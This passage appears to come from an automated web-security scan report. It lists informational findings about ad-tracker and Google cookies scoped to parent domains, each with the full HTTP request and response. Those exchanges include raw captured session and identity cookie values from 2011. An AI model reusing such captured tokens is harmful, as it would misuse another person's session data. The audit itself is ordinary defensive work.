User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+J%%LNO`q1dAwm#D.b$Vh%:BL/)KoJY7-0rw(eDJ*n7i%aT[>CE$WT)bC:u1N35Z>tomY?5J0hBLq-eI#9K$VvH+_$Es).Zo2bVEY9yagWMy7`.O3ciK/#S1wy`=>; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 00:18:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 00:18:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 00:18:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+J%%LNO`q1dAwm#D.b$Vh%:BL/)KoJY7-0rM.ey+7EBcIprW!28q'wjv4%Jbh%xw(Ne0WsNtFyxfG(p<n.w0F4D/7kx8wwggmYJaXX0wrGPOYhrw>I9ke!#qMEd:dshB%<3z!al; path=/; expires=Fri, 08-Jul-2011 00:18:23 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sat, 09 Apr 2011 00:18:23 GMT

GIF89a.............!.......,........@..L..;
5.78. http://id.google.com/verify/EAAAAB6lkOs5u81YRTwCEWoG6wY.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAB6lkOs5u81YRTwCEWoG6wY.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAB6lkOs5u81YRTwCEWoG6wY.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=45=ZT2dBRS_irSyCbE463isVR-nrd2UmliwAePF_FCzRQ=5MAvcF3Zm90UR1Kh; PREF=ID=e01b203a99971f0c:U=d212295d0f1573ee:FF=0:TM=1301786785:LM=1301836821:S=AJ4YE05fu5cLNNZE; NID=45=2n0e1W5_MaAh41CXKSdoaXqu35vMbjiifVyRtn1DMBwVJbE13IvcMlZIDijsF8MaTOfxdNQyHiFXdBnEPtokSQyvX00Wk2NFdxWix3dMOgE1UIQOzRT2_vJoVC6naACD

Response

HTTP/1.1 200 OK
Set-Cookie: NID=45=CltRPaNaBuDkwSYbM2nTsmlSxhQM-KH_fxb_G5H9qiuEQCwODK6IIZEp1cwyJRO8nMVrFGTYgRBttU-NASayOQTnJwMa0zFTZyGnTtFRcy05wcXkgDIXC-h8MmjLZ6vy; expires=Sun, 09-Oct-2011 00:22:47 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 09 Apr 2011 00:22:47 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
5.79. http://id.google.com/verify/EAAAAPvBCy6A6JaBSsfQHfS92x4.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAPvBCy6A6JaBSsfQHfS92x4.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAPvBCy6A6JaBSsfQHfS92x4.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=45=VCdJVmPHKDnKgNNNAYXd-p5FEr9lCNUXt0Ywd2nYeA=S3ljnMz-fz21PQBz; PREF=ID=e01b203a99971f0c:U=d212295d0f1573ee:FF=0:TM=1301786785:LM=1301836821:S=AJ4YE05fu5cLNNZE; NID=45=2n0e1W5_MaAh41CXKSdoaXqu35vMbjiifVyRtn1DMBwVJbE13IvcMlZIDijsF8MaTOfxdNQyHiFXdBnEPtokSQyvX00Wk2NFdxWix3dMOgE1UIQOzRT2_vJoVC6naACD

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=45=ZT2dBRS_irSyCbE463isVR-nrd2UmliwAePF_FCzRQ=5MAvcF3Zm90UR1Kh; expires=Sun, 09-Oct-2011 00:22:44 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 09 Apr 2011 00:22:44 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
5.80. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:4608069584519221037 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:8663496762294337265; KRTBCOOKIE_22=488-pcv:1|uid:4608069584519221037; KRTBCOOKIE_107=1471-uid:bf0d68cb-2449-4e5d-8b20-461d8ec850c3; PUBRETARGET=403_1396394640.401_1396394640.78_1396402387.1985_1305685077.82_1396559211.571_1396770949

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:20 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=403_1396394640.401_1396394640.78_1396402387.1985_1305685077.82_1396559211.571_1396770949; domain=pubmatic.com; expires=Sun, 06-Apr-2014 07:55:49 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html

5.81. http://insight.adsrvr.org/track/conv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insight.adsrvr.org
Path:   /track/conv

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /track/conv?pid=2ktjv7m&ct=0:ACQ_site&v=0&vf=USD&adv=7j9i29e&fmt=3 HTTP/1.1
Host: insight.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://ad.adsrvr.org/container/7j9i29e.1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private,no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 09 Apr 2011 00:18:41 GMT
Location: //cm.g.doubleclick.net/pixel?nid=TheTradeDesk
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Pragma: no-cache
Server: Microsoft-IIS/7.0
Set-Cookie: TDID=93caf860-6015-49f5-b797-e053c6c1f790; domain=.adsrvr.org; expires=Mon, 09-Apr-2012 00:18:41 GMT; path=/
X-AspNet-Version: 4.0.30319
Connection: keep-alive
Content-Length: 75

<img src="//cm.g.doubleclick.net/pixel?nid=TheTradeDesk" height=1 width=1/>
5.82. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=E05510 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBb3IQV+XT5RxDq2qIWAxW81lJ0QSlgYlQhAfV/yUINBw3cQgYrocUZKyvzimWAsuUtPsj5mWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSVFlz/vsh0oin7o3Bbz1tXhw1TpqAvMZ1v1Lv8NerqkTDVdntzlNMPA0y2boUy5Y7voYnl6yfgInYUDcW6SaAKQc8fmEXLMWnPd1UywCVDviQnU8+ot7CCucwAMHnPzp0i/Sn5tB+7puon3vUHjOAOCGmRh9dHzU6fIwRQmdiEhTO8yKU9t1bIy34gP5vFQ9MLGxzzqrLdQWtCrzaEs=; rtc_D3oY=MLsv7iUucA5nprADwxMUR9Sz0MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBepPr9SkW1eU9LpSn2tzgwRP0c/xx5jIRX7BMLqY4BgQC03lxOEmvvtSk5ET4IMDzv8yWjLYK7pDAruXWuMrqWQYCGy8NcEmqwJlS1r3QCTBMPKlGt8h8jhoskQYAEg5VB6abCKt0ty7d4V0r5LMiHjJ1yDDxjo3fWHFdlT0J3x3vNTBOP3u4LdR/ixLPJ4yHO+zAfzaP4HygF1suDMBuT4oX+Q3ErH7vVwhv5PsadCEykM5nhDDFNysSgXBEG+twoDa14AcpRzAbhEsFenqXNxpvSYpqc3Iy2NCgIfu7mw81csoIeKwTlkp9olnajK1wOkRn/RbFuU1Ma+eqf2bJ54C9QYGm/4BYb5mYPHUYbSUBiWvzEkXm4bqgQDP0t5t9xesus2w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39VMJbiprpr7J1tGod15FBuRpIyJ6dZqZhUw+nHk3d0sCmth9F4Cl7qRejK7RvOrYuZa+0vYBwiIMKX/E0mdpCmvoLUl2YHQjZeohUyN6UXprd3rlGsVixsKGfgYQ0bdWzYKJsapdJwmWdxMo5sZ2nRFuDhx8AXR7DmKcoQRFlecApkJPC+u3n3686I+Vi5ZPGoYBe11HfBziB6cjAOYVOExDMYLF1NAwE+IlNzf2H6Kq/o6en9aRFaI/j3LilmUURretejbxQDDUN68VOiMZ+YoG8WZyc8n0bJJVoHkw8rEHDggJbCSah99UVldkPTSUMKvcr1KbW/YoH2g27Afb0DBw+MN7W4hu6mom2LtWDcG2/i87xWb/QHs8rQ7e4YHJs1yMtk3GU2o81V9WE9zXBXjfp7XwTd60Pe7TDhbOWZBPS/QFuKInp9jIlzHzvACAkEsOtPTAioCxFpYl/YpFXTnStwIctyMjqxB7F32SDYDFlmQpQl3JCsq3vZEF6sn/FpvSIqcFYsnT4D97UT6KjNy+xU1rd0CtPH9xCAL8HGhSFw6hZtbcczwjvddxSy4DU1B0DbdrKwnvdFRwbDAagVOecSfz1cCg6V1RQMN6vQ+DMUnvokoYNmRBw8V9VxAZfg1ddsH8SExc2GVT/Ry4BZYbNm8qT3ELGVQzuGjsHDNmTXzyyx697U7CTcYEzdqbqqwHhLd1DFK+c2B5qnY3VjlyFLzAjm3UaBjZw7q86bv/w04rftqOg7r5tvCdU+KnFFvpSaoeEBUZYzJfDE0dlpSiBD+qzJbDsp/ZNYqwqF1XZmbhKbb66OrAimvQXYWVRLJZ+JcK3BLMRLaiZ8x9KK1dBI9S5qDkPl55LwcFthf6z9Rt2MXvvFQy4GTbExbJqlengID88+rRS9sMTbIOnxluH5Ap7hBfn/tL4sJmFrxwmI6VHXfAmabLblPec/94JrT48pEEvkh3/4STgLq5e8APbXeD4naEo55AtZi4sWvit53t3awJRl852EYUpQwnZQIoGgm5pFaUTu/hk+EcJG/9E2Oh5hc71ocL0olCbdpQg+Bq1x4CdLNS1U/oo/BYEJaTaoyzy3IvUTCdGPuzsbZo4XYAzsjZWdXquo7he0n/eaHLsDYMfrGzGHTURWHbQdl8b4q8xw==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:06 GMT; Path=/
Last-Modified: Mon, 11 Apr 2011 16:21:06 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 11 Apr 2011 17:21:06 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:05 GMT
Content-Length: 5835

//Vermont-12.4.0-1133
var rsi_now= new Date();
var rsi_csid= 'E05510';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba
...[SNIP]...
5.83. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=1,99999,60740,60489,60515,60514,52615,53656,57130,52766,56988,60197,56969,52576,56835,57129,56732,56830,56768,53575,53615,57125,50213&guidm=1:16pfbut1d45iun&bnum=43223 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=H88lNJpwIg02FAHCdbdBwhAZhXAcIgZ4FAHCAGeBwhwrhXAcI0NYGAHCYimBwhgQvaAcIQTnGAHCmMqBwhQRgaAc; GUID=MTMwMTc5NDU2NzsxOjE2cGZidXQxZDQ1aXVuOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=EFFoNJpwIg02FAHCdbdBwhAZhXAcIgZ4FAHCAGeBwhwrhXAcI0NYGAHCYimBwhgQvaAcIQTnGAHCmMqBwhQRgaAc; domain=advertising.com; expires=Mon, 08-Apr-2013 12:29:56 GMT; path=/
Set-Cookie: GUID=MTMwMjM1MjE5NjsxOjE2cGZidXQxZDQ1aXVuOjM2NQ; domain=advertising.com; expires=Mon, 08-Apr-2013 12:29:56 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 05:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sat, 09 Apr 2011 13:29:56 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.84. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=104&g=080&j=0&u=1234567&site=2222 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxli8sKwjAQRf9lvqAziZNkuiqmPrFUi9hdaZoIIt0orsR%252Ft3Xr5nA53NOLkvdzApy3HvJpkQAPVxOZXFTGYUqs%252ByGQwZiFgBQVzj9Egdctdg1luvDtrMgILIuyKVfr%252BmTH7L7bjLF6pIM%252F7i%252Bt%252Favq6qecgGVW2rFhIqeVMsQLyD9fAxIpjg%253D%253D; EVX=eJylzUEKgDAMRNG7eIJMao1JDxO67Nql9O622I0gWHA5vA%252BTLdpZTFmYKWVDX5QOw24LYgwuDhEngm%252B%252BL6mOGJPxqhpoNlbV2NLwlRbDU5nWoejKL4qh983WbvjfTa0XIFpQZw%253D%253D; BFF=eJzFVMtOwzAQ%252FBd%252FgZ%252B17FxaxIFIrYloVMEJ9ciZI%252FTf6yQl3bqziXioXHd2ZrybzO6jUfHjPSoZxequXQbttZaieovKOVNlwESxeUztw%252FrldVdv61ZU%252B2jdJMf0dSpCO1UBPG2eoUSuc51IQoVgvAaAzYAsGasm4Xc3ieu8krjH78512umi2Gppc%252FVTqmUIYVHonFEK6BEoOX5EOBvdURxno3mbkjOOqJBVk6Ym6lFk1e0TT3S5%252B5NNnXYnGzTRgAKbDJQcPyK03xMhDf5%252FanSxOkuMrlhAVU2R2QXz37JH%252BQU78JyeY%252FghBxy8E8YFqaIhYYJCFK3ypnvp1xCLXLZDmVRI47l8%252BMlNucUJ%252Bf7FmDkQ%252FB2YifzfJ5sP8ExW%252BUjOpu%252B%252FQvaLLN0yMh4HxFeHI9JB3gY%253D; TFF=eJydkj0OwjAMhe%252FSE9hOmkfSpcdg7dABiQ021LvjIgj9C7gdLEfJ%252B5K8J3dJJD1uiSVVDLRE3MYYpWq6pAeXxI1WXTtt9FkOqvcTvUCERsItCNE6%252FSP5CMkxOsgR0itJ9jfnudQHuWDlkDEboR2w392f%252B2t375d3402wbNgQ8vaxmOuLcfFvrhjXkkPGbITukS8oi955p3fe5x0Z25MWw6lt2fwZvvqwoV%252B9g3UCIQ%252FjC7MR4zA6k3J4At0qIAM%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: BFF=eJzFVMtuwjAQ%252FBd%252FgZ9x7Vyg6qGRihsVC5UT4si5x8K%252F105CWMxuoj5ErzM7O7tOZvdeKf%252F54QX3bPkYF05aKTmrD14Yo%252BpEKM9WryE%252Bv2x3m2bdRFbvvX6Y1KgOh01gpSiIt9U72iLhVCXWQjinrEQInQheKpZtwOduA1V50%252BIJnzvhsNJ4tpZcJ%252FTIxcI5VxV9Liwk5EiUGjsylI3MEkPZSNqm1IwrCsyqDVMbdSxmld8T3%252Bj67QebJmwGG2yjnkVsElFq7MjAegsaSeT%252Fh0ZXT6eB0Y0K6SqmxOQD09%252ByY%252BkHNsg4nUbRS%252FY8MicaF6wrtiSaIOdZFFblSc9LVAnWPQwQUAjhPHIUXEfQoeKJMAMOoPwyQy0YI1Gnn5yme1yi7x%252BemTtDn5OZy%252FH3B4K%252BAzORp5M9G%252BL%252FyuovInnP5Fk8Z3YqZ3SovgCHfvpx; expires=Sun, 07-Aug-2011 12:31:05 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydkjEOgzAMRe%252FCCWwnxCQsHKMrA0Olbu2GuHsNKqEkpDUMkSP0n%252BNvfh%252FIhfEZkEKFzB0Adt57qto%252BUBjvAVs5dW2kwHqdRG%252B%252F9MREMBMmIUhO84%252FEKyR6b5iukFZI0L%252B530t9kXNajiOmI6Qy63sPt%252BHRv4akt4MPgdlvFhsEVh%252BLvb64LvzNFdeVchwxHSHfwBaUVJoJT3rHc945Yme2hWzENh1OxpveHeizdzjfgIthXDAdMYfRKHsvM822GzjysEQS1muuTz1sEU44jpiOkJompKCc3s%252B%252FUUQ%253D; expires=Sun, 07-Aug-2011 12:31:05 GMT; path=/; domain=.exelator.com
Location: http://segments.adap.tv/data/?p=exelate&uid=1234567&sid=2222&ag=!!AGE!!&seg=927221
Content-Length: 0
Date: Sat, 09 Apr 2011 12:31:05 GMT
Server: HTTP server

5.85. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=204&g=051&j=0&bi=a53875b5-a877-4a03-ad1a-e28c70299475 HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/gtpdp.aspx?i=50
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxli8sKwjAQRf9lvqAziZNkuiqmPrFUi9hdaZoIIt0orsR%252Ft3Xr5nA53NOLkvdzApy3HvJpkQAPVxOZXFTGYUqs%252ByGQwZiFgBQVzj9Egdctdg1luvDtrMgILIuyKVfr%252BmTH7L7bjLF6pIM%252F7i%252Bt%252Favq6qecgGVW2rFhIqeVMsQLyD9fAxIpjg%253D%253D; EVX=eJylzUEKgDAMRNG7eIJMao1JDxO67Nql9O622I0gWHA5vA%252BTLdpZTFmYKWVDX5QOw24LYgwuDhEngm%252B%252BL6mOGJPxqhpoNlbV2NLwlRbDU5nWoejKL4qh983WbvjfTa0XIFpQZw%253D%253D; BFF=eJzFVMtOwzAQ%252FBd%252FgR9xLDuXFnEgEjURtSo4oR45cwT%252BHTsx7sbdTURB5TqzO7PrZOfolHbvb05wx7Y3YWOlkZKz7tUJrVUXCeXY7sGHu%252Fvnl0O%252F7wPrjk6LxR414lAEVoqKeNw9oRIRpyoxCWGtMhIhmkjwumM7eHzuwVOVZxK3%252BNwRh5Xasb3kTUQ%252FuNhYa9tK58RCQhai7jGFoWxkatGUjaRt6p6yosCsBr%252B00chiVuk98Y3mb59ten%252FINthGE4vYRKLuMYWB9QYISeT%252Fh0azp2uA0VkXoiqWmskHpr%252FlyNIPrJFxxh5FLznxyJzouWCq2JLoBVnHgjAqTfq9RBvhZoIBAgohnEYOgjcBKLQ8EjrjAEovk2vBGBOVZTyUkScZD6BZrSrE5yX5do04%252B3l6rYQVnUkr8fP3KUOHyUpu0PGwmgT%252FdfC%252FuOtrnq%252FBj9UsHesll0md4ReE4BYY; 